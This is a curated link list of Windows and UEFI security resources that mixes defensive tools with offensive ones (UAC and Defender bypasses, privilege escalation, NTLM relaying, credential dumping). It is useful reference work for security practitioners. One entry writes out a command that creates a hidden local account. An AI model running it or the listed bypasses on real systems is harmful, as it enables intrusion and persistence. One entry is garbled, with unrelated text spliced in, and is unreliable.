- [How to Get Started With VMware vSphere Security « vMiss.net](https://vmiss.net/2018/09/19/how-to-get-started-with-vmware-vsphere-security/)
- [routeros](https://github.com/tenable/routeros): RouterOS Bug Hunt Materials Presented at Derbycon 2018
- [Awesome-Study-Resources-for-Kernel-Hacking](https://github.com/yeyintminthuhtut/Awesome-Study-Resources-for-Kernel-Hacking): Kernel Hacking study materials collection
- [Skadi](https://github.com/orlikoski/Skadi): Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux.
- [taintgrind](https://github.com/wmkhoo/taintgrind):A taint-tracking plugin for the Valgrind memory checking tool. [gcc + LD_PRELOAD + taintgrind + graphviz](https://gist.github.com/tkchia/8e4ce913ac28f07be64154cff8fef62e)
- [UPX](https://upx.github.io/) is a free, portable, extendable, high-performance executable packer for several executable formats. [repo](https://github.com/upx/upx)
- Mainframe:
- [MF Sniffer](https://github.com/mainframed/MFSniffer): Mainframe TN3270 unencrypted TSO session user ID and password sniffer.
- [magic-trace](https://github.com/janestreet/magic-trace): collects and displays high-resolution traces of what a process is doing.

### UEFI

- [uefi-jitfuck](https://github.com/m4tx/uefi-jitfuck): A JIT compiler for Brainfuck running on x86_64 UEFI
- [Secure Boot in the Era of the T2](https://duo.com/labs/research/secure-boot-in-the-era-of-the-t2): Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot.
- [PSPTool](https://github.com/cwerling/psptool): Display, extract, and manipulate PSP firmware inside UEFI images
- [Project Mu](https://microsoft.github.io/mu/): is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern. [github repo](https://github.com/microsoft/mu/)
- [Force firmware code to be measured and attested by Secure Launch on Windows 10](https://www.microsoft.com/security/blog/2020/09/01/force-firmware-code-to-be-measured-and-attested-by-secure-launch-on-windows-10/)

### Windows

- [Awesome Advanced Windows Exploitation References](https://github.com/yeyintminthuhtut/Awesome-Advanced-Windows-Exploitation-References)
- [windows kernel security development](https://github.com/ExpLife0011/awesome-windows-kernel-security-development)
- [A process scanner detecting and dumping hollowed PE modules.](https://github.com/hasherezade/hollows_hunter)
- [dll_to_exe](https://github.com/hasherezade/dll_to_exe): Converts a DLL into EXE
- [pe-sieve](https://github.com/hasherezade/pe-sieve): Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
- [A PowerShell utility to dynamically uncover a DCShadow attack](https://github.com/AlsidOfficial/UncoverDCShadow/)
- Security Research from the Microsoft Security Response Center ([MSRC](https://github.com/Microsoft/MSRC-Security-Research))
- [DCSYNCMonitor](https://github.com/shellster/DCSYNCMonitor)
- [Total Meltdown?](http://blog.frizk.net/2018/03/total-meltdown.html)
- [DetectionLab](https://github.com/clong/DetectionLab): Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post [here](https://medium.com/@clong/introducing-detection-lab-61db34bed6ae)
- [powerlessshell](https://github.com/Mr-Un1k0d3r/PowerLessShell): Run PowerShell command without invoking powershell.exe.
- [internal-monologue](https://github.com/eladshamir/Internal-Monologue): Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
- [Robber](https://github.com/MojtabaTajik/Robber) is open source tool for finding executables prone to DLL hijacking
- [Remote-Desktop-Caching](https://github.com/Viralmaniar/Remote-Desktop-Caching-/blob/master/README.md)
- [LogRM](https://github.com/tasox/LogRM/): LogRM is a post exploitation powershell script which it uses windows event logs to gather information abou
- [InvisiblePersistence](https://github.com/ewhitehats/InvisiblePersistence): Persisting in the Windows registry "invisibly"
- [Dynamic Tracing in Windows 10 19H1](http://www.alex-ionescu.com/?p=358)
- [Capturing NetNTLM Hashes with Office [DOT] XML Documents](https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/)
- [LoL Malware Meets Python-Based Command and Control (C2) Server, Part I](https://blog.varonis.com/koadic-lol-malware-meets-python-based-command-and-control-c2-server-part-i/)
- [Passing-the-Hash to NTLM Authenticated Web Applications](https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/)
- [Detours](https://github.com/Microsoft/Detours): Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form.
- [r0ak](https://github.com/ionescu007/r0ak): r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on for Windows 10 Systems.
- [SpeculationControl](https://github.com/Microsoft/SpeculationControl): SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown).
- Reverse Engineering Windows Defender (by Alexei Bulazel): [pdf](https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender.pdf) and [videos](https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Alexei%20Bulazel/Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/)
- Ground Zero: Part 2-2 [XOR encryption – Windows x64](https://scriptdotsh.com/index.php/2018/05/09/ground-zero-part-2-2-reverse-engineering-xor-encryption-windows-x64/)
- Ground Zero: Part 2-3 [Building Cracked Binaries – Windows x64](https://scriptdotsh.com/index.php/2018/06/09/ground-zero-part-2-3-reverse-engineering-building-cracked-binaries-windows-x64/)
- [EKFiddle](https://github.com/malwareinfosec/EKFiddle): A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general.
- [Windows Command-Line](https://blogs.msdn.microsoft.com/commandline/2018/08/02/windows-command-line-introducing-the-windows-pseudo-console-conpty/): Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
- [MSconsole](https://github.com/microsoft/console): Windows Console Tools
- [PowerShell Remoting](https://www.sconstantinou.com/powershell-remoting/) by Stephanos Constantinou Blog
- [DbgShell](https://github.com/Microsoft/DbgShell): A PowerShell front-end for the Windows debugger engine.
- [Windows Incident Response: Updates](http://windowsir.blogspot.com/2018/08/updates.html?spref=tw&m=1)
- [Win 10 related research](https://github.com/kacos2000/Win10)
- [Event log 'Keywords' p1](https://github.com/kacos2000/Win10/blob/master/EventLogs/keywords.md)
- [Windows 10 - Notifications](https://github.com/kacos2000/Win10/blob/master/Notifications/readme.md)
- [UAC bypass using CreateNewLink COM interface](https://gist.github.com/hfiref0x/e58711820276fe8b1b36dd51faae59cf)
- Privilege Escalation:
- [Windows Privilege Escalation (Unquoted Path Service)](http://www.hackingarticles.in/windows-privilege-escalation-unquoted-path-service/)
- [WinPwnage](https://github.com/rootm0s/WinPwnage): Elevate, UAC bypass, privilege escalation, dll hijack techniques
- [Securing SCOM in a Privilege Tiered Access Model](https://nathangau.wordpress.com/2018/07/17/securing-scom-in-a-privilege-tiered-access-model-part-1/)–Part 1
- [Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/): This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.
- [An introduction to privileged file operation abuse on Windows](https://offsec.provadys.com/intro-to-file-operation-abuse-on-Windows.html): This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs.
- [Control Flow Guard Teleportation](https://86hh.github.io/cfg2.html): The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is valid function. [demo](https:/The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.nprivileged window could just send commands to a highly privileged window, and that’s what UIPI, User Interface Privilege Isolation, prevents. This isn’t a story about UIPI, but it is how it began. [ctftool](https://github.com/taviso/ctftool) - Interactive CTF Exploration Tool
- [PsExec Local Privilege Escalation](https://medium.com/tenable-techblog/psexec-local-privilege-escalation-2e8069adc9c8)
- [SweetPotato](https://github.com/CCob/SweetPotato): Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019.
- [Windows Exploit Suggester - Next Generation (WES-NG)](https://github.com/bitsadmin/wesng).
- [Remote NTLM relaying through meterpreter on Windows port 445](https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/), [DivertTCPconn](https://github.com/Arno0x/DivertTCPconn): A TCP packet diverter for Windows platform.
- [Analyzing obfuscated powershell with shellcode](https://blog.stillztech.com/2018/06/analyzing-obfuscated-powershell-with.html), [Empire is a PowerShell and Python post-exploitation agent.](https://github.com/EmpireProject/Empire). [OVERVIEW OF EMPIRE 3.4 FEATURES](https://www.bc-security.org/post/overview-of-empire-3-4-features/)
- [Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.](https://www.bc-security.org/post/empire-4-2/)
- [relayer](https://github.com/Jsitech/relayer): SMB Relay Attack Script
- [Ps1jacker](https://github.com/darkw1z/Ps1jacker): Ps1jacker is a tool for generating COM Hijacking payload.
- [python-dotnet-binaryformat](https://github.com/williballenthin/python-dotnet-binaryformat): Pure Python parser for data encoded by .NET's BinaryFormatter
- [Firework](https://github.com/SpiderLabs/Firework/): Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
- [hUACME](https://github.com/hfiref0x/UACME/): Defeating Windows User Account Control
- [SysmonTools](https://github.com/nshalabi/SysmonTools): Utilities for Sysmon
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config): Sysmon configuration file template with default high-quality event tracing.
- [Sysmon: how to set up, update and use?](https://cqureacademy.com/blog/server-monitoring/sysmon)
- [Panache_Sysmon](https://github.com/sbousseaden/Panache_Sysmon): Just another sysmon config
- [Hiding malware in Windows](https://prdeving.wordpress.com/2018/09/21/hiding-malware-in-windows-code-injection/) – The basics of code injection
- [Inveigh](https://github.com/Kevin-Robertson/Inveigh): Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. [announcement](https://blog.netspi.com/inveigh-whats-new-in-version-1-4/)
- [Bypassing AppLocker Custom Rules](https://0x09al.github.io/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html): 0x09AL Security blog
- [SpecuCheck](https://github.com/ionescu007/SpecuCheck): SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
- [RID-Hijacking](https://github.com/r4wd3r/RID-Hijacking/): Windows RID Hijacking persistence technique
- [WSL Reloaded](https://www.slideshare.net/AnthonyLAOUHINETSUEI/wsl-reloaded)
- [Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [reflectivepotato](https://github.com/realoriginal/reflectivepotato): MSFRottenPotato built as a Reflective DLL. Work in progress.
- [randomrepo](https://github.com/SandboxEscaper/randomrepo): Repo for random stuff
- [Microsoft Windows win32k.sys](https://nafiez.github.io/security/pointer/2018/11/09/Microsoft-win32ksys-invalid-pointer.html): Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
- [rdpy](https://github.com/citronneur/rdpy): Remote Desktop Protocol in Twisted Python
- [SharpWeb](https://github.com/djhohnstein/SharpWeb): NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge.
- [reconerator](https://github.com/stufus/reconerator): C# Targeted Attack Reconnissance Tools
- [ManbagedInjection](https://github.com/malcomvetter/ManagedInjection): A proof of concept for dynamically loading .net assemblies at runtime with only a minimal convention pre-knowledge
- [InveighZero](https://github.com/Kevin-Robertson/InveighZero): C# LLMNR/NBNS spoofer
- [DanderSpritz Lab](https://github.com/francisck/DanderSpritz_lab): A fully functional [DanderSpritz](https://danderspritz.com/) lab in 2 commands.
- [Lateral movement using URL Protocol](https://medium.com/@mattharr0ey/lateral-movement-using-url-protocol-e6f7d2d6cf2e) [gist](https://gist.github.com/homjxi0e/2e47ffa59e314df04324937a13f8f320)
- [HiddenPowerShell](https://github.com/b4rtik/HiddenPowerShellDll): This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker.
- [One Windows Kernel](https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/One-Windows-Kernel/ba-p/267142).
- [The Dog Whisperer’s Handbook](https://insinuator.net/2018/11/the-dog-whisperers-handbook/): This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module.
- [Attack and Defend microsoft enhanced security administrative environment](https://download.ernw-insight.de/troopers/tr18/slides/TR18_AD_Attack-and-Defend-Microsoft-Enhanced-Security.pdf)
- [raw-socket-snifferr](https://github.com/nospaceships/raw-socket-sniffer): Packet capture on Windows without a kernel drive
- [DCOMrade](https://github.com/sud0woodo/DCOMrade): Powershell script for enumerating vulnerable DCOM Applications
- [shed](https://github.com/enkomio/shed): .NET runtime inspector
- [Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host](https://0x00-0x00.github.io/research/2018/11/06/Recovering-Plaintext-Domain-Credentials-From-WPA2-Enterprise-on-a-compromised-host.html)
- [How to steal NTLMv2 hashes using file download vulnerability in web application](http://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html)
- [NTLMRelay2Self](https://github.com/med0x2e/NTLMRelay2Self): An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).
- [Simpleator](https://github.com/ionescu007/Simpleator): ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
- [WinDbg-Samples](https://github.com/Microsoft/WinDbg-Samples): Sample extensions, scripts, and API uses for WinDbg.
- [OrgKit](https://github.com/SwiftOnSecurity/OrgKit): Provision a brand-new company with proper defaults in Windows, Offic365, and Azure
- [Leveraging WSUS](https://ijustwannared.team/2018/10/15/leveraging-wsus-part-one/).
- [windowsblindread](https://github.com/soffensive/windowsblindread): A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
- [azucar](https://github.com/nccgroup/azucar): Security auditing tool for Azure environments
- [volatility-wnf](https://github.com/citronneur/volatility-wnf): Browse and dump Windows Notification Facilities.
- [Yet another sdclt UAC bypass](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass): As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
- [awesome-windows-kernel-security-development](https://github.com/ExpLife0011/awesome-windows-kernel-security-development): windows kernel security development.
- [ALPC-BypassUAC](https://github.com/DimopoulosElias/alpc-mmc-uac-bypass): UAC Bypass with mmc via alpc.
- [ManagedPasswordFilter](https://github.com/raandree/ManagedPasswordFilter): Windows Password Filter that uses managed code internally
- [DeviceGuardBypasses](https://github.com/tyranid/DeviceGuardBypasses): A repository of some of my Windows 10 Device Guard Bypasses
- [rifiuti2](https://github.com/abelcheung/rifiuti2): Windows Recycle Bin analyser
- [Reversing and Patching .NET Binaries with Embedded References](https://insinuator.net/2018/04/reversing-and-patching-net-binaries-with-embedded-references/)
- [Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript](https://posts.specterops.io/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript-a88a81df27eb)
- [Windows PowerShell Remoting](https://b2dfir.blogspot.com/2018/11/windows-powershell-remoting-host-based.html): Host Based Investigation and Containment Techniques.
- [.NET Manifesto](https://onedrive.live.com/view.aspx?resid=B9E47855F9345D3B!3797&ithint=file%2cpptx&authkey=!ALrCxfPMtzZMm8E): win friends and influence the loader. [malwariaLabs](https://github.com/malwarialabs). [slides](https://onedrive.live.com/redir?resid=B9E47855F9345D3B!3797&authkey=!ALrCxfPMtzZMm8E&page=Download) from [derbycon 2019](https://github.com/malwarialabs/DerbyCon2019)
- [Bypassing Windows User Account Control](https://medium.com/@z3roTrust/bypassing-windows-user-account-control-9051c6a85734)
- [symboliclink-testing-tools](https://github.com/googleprojectzero/symboliclink-testing-tools): This is a small suite of tools to test various symbolic link types of Windows.
- [Run PowerShell without Powershell.exe](https://medium.com/@Bank_Security/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628) — Best tools & techniques
- [Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor](https://medium.com/@philiptsukerman/bypassing-the-microsoft-windows-threat-intelligence-kernel-apc-injection-sensor-92266433e0b0)
- [Privileged Access Workstations](https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/privileged-access-workstations)
- [Activation Contexts](https://medium.com/philip-tsukerman/activation-contexts-a-love-story-5f57f82bccd) — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
- [Evil-WinRM](https://github.com/Hackplayers/evil-winrm): The ultimate WinRM shell for hacking/pentesting
- [Understanding WdBoot (Windows Defender ELAM)](https://n4r1b.netlify.com/en/posts/2019/11/understanding-wdboot-windows-defender-elam/)
- [SharpHide](https://github.com/outflanknl/SharpHide): Tool to create hidden registry keys.
- [Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account](http://passing-the-hash.blogspot.com/2015/02/microsoft-finally-releases-guidance-and.html)
- [Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths](https://apt29a.blogspot.com/2019/11/deploying-honeytokens-in-active.html)
- [CrackMapExec](https://gist.github.com/Hackndo/5560e4e9aa8aa6aad2720e4260d126a3) module to set as "owned" on BloodHound every target owned by the attacker
- [Configuring Additional LSA Protection](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection)
- [Getting Malicious Office Documents to Fire with Protected View Enable](https://medium.com/@curtbraz/getting-malicious-office-documents-to-fire-with-protected-view-4de18668c386)
- The Internals of AppLocker:
- Part 1: [Overview and Setup](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-1.html)
- Part 2: [Blocking Process Creation](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-2.html)
- Part 3: [Access Tokens and Access Checking](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-3.html)
- Part 4: [Blocking DLL Loading](https://tyranidslair.blogspot.com/2019/11/the-internals-of-applocker-part-4.html)
- [COM-Code-Helper](https://github.com/fboldewin/COM-Code-Helper): Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code.
- [Scylla](https://github.com/NtQuery/Scylla): Imports Reconstructor
- [A Speed-Research on Windows Explorer's Auto-Completion](https://ophirharpaz.github.io/2019/08/09/a-speed-research-on-Windows-explorer.exe-autocompletion.html)
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config): A Sysmon configuration file for everybody to fork
- [Windows Event Forwarding Guidance](https://github.com/palantir/windows-event-forwarding)
- [Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI](https://docs.microsoft.com/en-us/archive/blogs/jepayne/weffles)
- [Microsoft Defender Advanced Threat Protection (ATP)](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/microsoft-defender-atp-for-linux-is-now-generally-available/ba-p/1482344)
- [BeaKer](https://github.com/activecm/BeaKer) - Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
- [python-ntlm](https://github.com/mullender/python-ntlm): Automatically exported from code.google.com/p/python-ntlm
- [Logging Made Easy](https://github.com/ukncsc/lme): is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- [lme](https://github.com/ukncsc/lme): Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks.
- [SharePoint and Pwn](https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html) :: Remote Code Execution Against SharePoint Server Abusing DataSet
- [Secure DevOps Kit for Azure](https://github.com/azsk/DevOpsKit-docs) (AzSK)
- [Windows Debugger API — The End of Versioned Structures](https://medium.com/swlh/windows-debugger-api-the-end-of-versioned-structures-ac4acaa351bd)
- [DisableAntiSpyware](https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware)
- [Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?](https://twitter.com/SteveSyfuhs/status/1297957799079510018)
- [DefendTheFlag](https://github.com/microsoft/DefendTheFlag/): Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products.
- [DumpReparsePoints](https://github.com/tyranid/DumpReparsePoints): This is a simple tool to dump all the reparse points on an NTFS volume.
- [Certify SSL Manager](https://certifytheweb.com/): manage free https certificates for IIS
- [Bypassing Credential Guard](https://teamhydra.blog/2020/08/25/bypassing-credential-guard/): Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory.
- [WSUS Attacks Part 1: Introducing PyWSUS](https://www.gosecure.net/blog/2020/09/03/wsus-attacks-part-1-introducing-pywsus/)
- [This is about adding a $ account and have it not show up in net users.](https://twitter.com/Ben0xA/status/1301550957516541952): net user $ LetMeIn123! /add /active:yes
- [LECmd](https://github.com/EricZimmerman/LECmd): Lnk Explorer Command line edition!!
- [PECmd](https://github.com/EricZimmerman/PECmd): Prefetch Explorer Command Line.
- [Five PE Analysis Tools Worth Looking At](https://blog.malwarebytes.com/threat-analysis/2014/05/five-pe-analysis-tools-worth-looking-at/)
- [pestudio](https://www.winitor.com/download/): The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide.
- [PEview version](http://wjradburn.com/software/)
- [FileAlyzer](https://www.safer-networking.org/products/filealyzer/)
- [NTCore](https://ntcore.com/?page_id=388) Explorer Suite
- [exeinfo](http://exeinfo.byethost18.com/?i=1) [github](https://github.com/ExeinfoASL/ASL)
- [MitigationFlagsCliTool](https://github.com/yardenshafir/MitigationFlagsCliTool): Prints mitigation policy information for processes in a dump file.
- [Windows 10 System Programming book samples](https://github.com/zodiacon/Win10SysProgBookSamples) [Windows Internals Book 7th Edition Tools](https://github.com/zodiacon/WindowsInternals), [The Windows Kernel Programming book samples](https://github.com/zodiacon/windowskernelprogrammingbook)
- [DriverMon](https://github.com/zodiacon/DriverMon): Monitor activity of any driver
- [Windows AllTools](https://github.com/zodiacon/AllTools): All reasonably stable tools
- [Sysmon Internals](https://undev.ninja/sysmon-internals-from-file-delete-event-to-kernel-code-execution/): From File Delete Event to Kernel Code Execution
- [Windows-driver-samples](https://github.com/microsoft/Windows-driver-samples): This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples.
- [procfilter](https://github.com/godaddy/procfilter): A YARA-integrated process denial framework for Windows
- [Winerror](https://github.com/AandersonL/WinError): Get Windows Programming error codes descriptions using the command line.
- [ProcessHacker](https://github.com/processhacker/processhacker): The Minimalistic x86/x64 API Hooking Library for Windows
- [PVE CA Cert List Utility](https://www.corelan.be/index.php/2009/04/10/free-tool-windows-2008-certificate-authority-certificate-list-utility-for-pending-requests-and-about-to-expire-certificates/): Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
- [Release the Kraken: Fileless injection into Windows Error Reporting service](https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/)
- [MinHook](https://github.com/TsudaKageyu/minhook): The Minimalistic x86/x64 API Hooking Library for Windows.
- [Windows security baselines](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-baselines)
- [TokenPlayer](https://github.com/S1ckB0y1337/TokenPlayer): Manipulating and Abusing Windows Access Tokens.
- [The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment](https://www.sans.org/reading-room/whitepapers/cloud/poisoned-postman-detecting-manipulation-compliance-features-microsoft-exchange-online-environment-39850)
- [ntlmscan](https://github.com/nyxgeek/ntlmscan): scan for NTLM directories.
- [Smbtouch-Scanner](https://github.com/3gstudent/Smbtouch-Scanner): Automatically scan the inner network to detect whether they are vulnerable.
- [Block process creations originating from PSExec and WMI commands](https://twitter.com/nemesis09/status/1330857839112450051)
- [VDM](https://githacks.org/_xeroxz/vdm):Vulnerable Driver Manipulation. [physmem_drivers](https://github.com/namazso/physmem_drivers): A collection of various vulnerable (mostly physical memory exposing) drivers.
- Source code for [HppDLL](https://github.com/last-byte/HppDLL): local password dumping using MsvpPasswordValidate hooks
- [SharpMapExec](https://github.com/cube0x0/SharpMapExec): A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.
- [Fibratus](https://github.com/rabbitstack/fibratus): A modern tool for the Windows kernel exploration and observability.
- [Ultimate WDAC Bypass List](https://github.com/bohops/UltimateWDACBypassList/): A centralized resource for previously documented WDAC bypass techniques
- [Live Patching Windows API Calls Using PowerShell](https://isc.sans.edu/forums/diary/Live+Patching+Windows+API+Calls+Using+PowerShell/26826/)
- [fibratus](https://www.fibratus.io/): A modern tool for the Windows kernel exploration and observability
- [Adventures in Dynamic Evasion](https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa?gi=56694e4aad94)
- [Windows-Insight](https://github.com/ernw/Windows-Insight): The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies.
- [Fully working SMB protocol implementation in webassembly](https://twitter.com/SkelSec/status/1346517626026123268)
- [Parent Process vs. Creator Process](https://scorpiosoftware.net/2021/01/10/parent-process-vs-creator-process/amp/)
- [WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732)](https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/) IS USED BY BITTER APT IN TARGETED ATTACK
- [ntvdmx64](https://github.com/leecher1337/ntvdmx64): Run Microsoft Windows NTVDM (DOS) on 64bit Editions
- [Spectre exploits in the "wild"](https://dustri.org/b/spectre-exploits-in-the-wild.html)
- [RegRipper](https://github.com/keydet89/RegRipper3.0)
- [Security rapid modernization plan](https://docs.microsoft.com/en-us/security/compass/security-rapid-modernization-plan).
- [Windows & Active Directory Exploitation Cheat Sheet and Command Reference](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
- [Finding writable folders and hijackable DLLs](https://medium.com/@markmotig/finding-writable-folders-and-hijackable-dlls-3594a9a0b1c8)
- [OffensiveCSharp](https://github.com/matterpreter/OffensiveCSharp): Collection of Offensive C# Tooling.
- [Hyper-V internals researches](https://github.com/gerhart01/Hyper-V-Internals): Internals information about Hyper-V.
- [Do You Really Know About LSA Protection (RunAsPPL)?](https://itm4n.github.io/lsass-runasppl/). [Bypassing LSA Protection in Userland](https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/) [PPLdump](https://github.com/itm4n/PPLdump): Dump the memory of a PPL with a userland exploit. [comments](https://twitter.com/itm4n/status/1385218719320875009)
- [fibratus](https://github.com/rabbitstack/fibratus): A modern tool for the Windows kernel exploration and tracing.
- [MSTSC Packet Dump Utility](https://github.com/nogginware/mstscdump): The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL.
- [How to bypass Defender in a few easy steps](https://arty-hlr.com/blog/2021/05/06/how-to-bypass-defender/)
- [Running NetworkMiner in Windows Sandbox](https://www.netresec.com/?page=Blog&month=2021-05&post=Running-NetworkMiner-in-Windows-Sandbox)
- [Windows Desktop](https://github.com/OSWatcher/windows-desktop): History and analysis of Windows desktop images.
- [A collection of tools to interact with Microsoft Security Response Center API](https://github.com/Immersive-Labs-Sec/msrc-api)
- [GetTempPathW function](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-gettemppathw)
- [No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders](https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/)
- [Human-operated ransomware](https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware): Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry.
- [Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft](https://www.microsoft.com/security/blog/2021/08/05/sharing-the-first-simuland-dataset-to-expedite-research-and-learn-about-adversary-tradecraft/)
- [Microsoft Security Best Practices](https://docs.microsoft.com/en-us/security/compass/compass)
- [No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders](https://blog.lumen.com/no-longer-just-theory-black-lotus-labs-uncovers-linux-executables-deployed-as-stealth-windows-loaders/)
- [Awesome Windows Domain Hardening](https://github.com/PaulSec/awesome-windows-domain-hardening): A curated list of awesome Security Hardening techniques for Windows.
- [Event Log Explorer™ for Windows event log analysis](https://eventlogxp.com/)
- [Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory](https://adsecurity.org/?p=1515)
- [EVERYONE GETS A ROOTKIT](https://eclypsium.com/2021/09/23/everyone-gets-a-rootkit/): Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8.
